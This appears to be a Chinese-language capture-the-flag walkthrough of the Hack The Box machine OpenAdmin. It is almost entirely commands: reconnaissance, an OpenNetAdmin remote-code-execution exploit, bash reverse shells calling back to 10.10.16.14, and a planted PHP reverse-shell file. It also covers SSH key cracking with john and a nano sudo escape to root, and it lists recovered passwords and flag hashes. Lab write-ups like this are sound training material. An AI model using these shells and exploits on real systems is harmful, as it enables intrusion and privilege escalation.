[Meachines] [Easy] OpenAdmin OpenNetAdmin-RCE+RSA私钥解密+Nano权限提升

信息收集

IP Address	Opening Ports
10.10.10.171	TCP:22,80

$ nmap -p- 10.10.10.171 --min-rate 1000 -sC -sV

bash 复制代码

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

$ gobuster dir -u "http://10.10.10.171/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

username:admin password:admin

http://10.10.10.171/ona/

$ searchsploit OpenNetAdmin

$ cp /usr/share/exploitdb/exploits/php/webapps/47691.sh ./exp.sh

$ ./exp.sh 10.10.10.171/ona/

$ /bin/bash -c 'bash -i >%26 /dev/tcp/10.10.16.14/10032 0>%261'

www-data 横向 jimmy

$ cat /var/www/html/ona/local/config/database_settings.inc.php

username:ona_sys password:n1nj4W4rri0R!

$ su jimmy

jimmy 横向 joanna

方法1:HTTP

$ cat /etc/apache2/sites-enabled/internal.conf

$ ssh -i ~/.ssh/id_ed25519 jimmy@10.10.10.171 -L 52846:localhost:52846

http://127.0.0.1:52846/

$ vi /var/www/internal/reverse.php

php 复制代码

<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.14/10033 0>&1'");?>

$ curl http://127.0.0.1:52846/reverse.php

方法 2:RSA私钥解密SSH登录

$ cat main.php

$ curl 127.0.0.1:52846/main.php

$ openssl rsa -in id_rsa

$ grep -i ninja /usr/share/wordlists/rockyou.txt > pass.txt

$ ssh2john id_rsa >./id_rsa.john

$ john --wordlist=./pass.txt id_rsa.john

password:bloodninjas

$ openssl rsa -in id_rsa -out id_rsa_dec

User.txt

f6a493f3f0bb5732733a0f6e0eae9cf9

权限提升

$ sudo -l

$ sudo /bin/nano /opt/priv

^R^X

reset; sh 1>&0 2>&0

Root.txt

709cb8750a646cbc3d99cedbc8d23de7